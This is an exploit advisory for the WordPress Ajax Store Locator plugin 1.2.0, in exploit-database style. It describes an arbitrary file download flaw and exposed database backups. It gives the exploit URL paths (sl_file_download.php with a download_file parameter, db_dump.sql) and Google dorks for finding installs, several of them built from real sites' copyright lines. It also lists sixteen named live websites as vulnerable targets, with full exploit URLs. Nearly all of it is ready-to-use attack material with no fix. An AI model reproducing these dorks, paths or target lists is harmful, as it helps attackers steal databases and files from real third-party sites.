WordPress CodeCanyon-5293356-Ajax-Store-Locator-Wordpress plugin version 1.2.0 suffers from file disclosure and database disclosure vulnerabilities.
0e905f17d334ee3dab53921421008a83
#################################################################################################
# Exploit Title : WordPress CodeCanyon-5293356-Ajax-Store-Locator-Wordpress
Plugins 1.2.0 Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 10/12/2018
# Vendor Homepage : wordpress.org ~
codecanyon.net/item/ajax-store-locator-v-20/4106209?s_rank=1
+ gizmocode.com ~ codecanyon.net/item/ajax-store-locator-wordpress/5293356
# Software Download Link : codecanyon.net/user/gizmocode/portfolio
# Software Price : 16$
# More Information About Software :
+
themesinfo.com/wordpress-plugins/wordpress-codecanyon-5293356-ajax-store-locator-wordpress-plugin-dn4k
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.2.0 and 2.0
# Exploit Risk : Medium
# Google Dorks :
inurl:''/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/''
+ inurl:''/wp-content/plugins/ajax-store-locator-wordpress/''
intext:''Powered By Gizmocode.com''
intext:''Powered by New Age Media Web''
intext:''2018 Agromaster Oy''
intext:''Copyright A(c) 2011-2014 Nationwide MRI. All Rights Reserved.''
intext:''A(c) 2015 by Palestra Digital''
intext:''Copyright A(c) 2018 TMUK GROUP LTD''
intext:''Copyright 2018 Omnicor, Inc. | All Rights Reserved''
intext:''Powered by WordPress | Theme Fusion''
intext:''Tous droits rA(c)servA(c)s A(c) 2018 Bfly.ca''
intext:''Managed by Kjenmarks - Wordpress specialisten''
intext:'' Site by Lucian Mitiu''
intext:''Avaz Inc. A(c) 2015 droits de reproduction rA(c)servA(c)s. Politique de
confidentialitA(c)''
intext:''realizacja: echomarketing.pl''
intext:''COPYRIGHT 2018 PROQUIP GOLF''
intext:''@2015 BAHAR AL-KUWAIT GROUP HOLDING COMPANY''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
1) Vulnerabilities includes ;
a) Arbitrary File Download Vulnerability
b) Database Backup Disclosure Vulnerability
#################################################################################################
Main Features of the Software =>
Directions to an searched location.
Street view.
Custom Info label for providing additional information.
Social Sharing of searched locations (Facebook, Twitter and Pinterest).
Configurable Layouts.
Search and browse option.
Category filtration of store locations.
Manual plotting on map for addresses which Google doesnat understand.
Drawer panel for more map access.
Guided Installation wizard and much more features.
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Arbitrary File Download Exploit =>
/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[FAdegLENAMEHERE]
/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_import/......
/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/xcel_export/......
/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/xcel_import_result/......
# Database Backup Disclosure Exploit :
/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
/wp-content/plugins/ajax-store-locator-wordpress/db_dump.sql
#################################################################################################
# Example Vulnerable Sites =>
[+]
pilkemaster.fi/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
pilkemaster.fi/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[FILENAME]
[+]
tmuk.org/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
wikkistix.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
kellogg-american.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
recargapr.com/web/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
nationwidemri.com/wp-content/plugins/ajax-store-locator-wordpress/db_dump.sql
[+]
floralelement.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
theblinkserver.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
masjewelz.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
albahargroup.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
anokhi-collection.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
proquipgolf.com/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
avazapp.fr/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
beninca.pl/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
[+]
vintagetegels.nl/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/db_dump.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################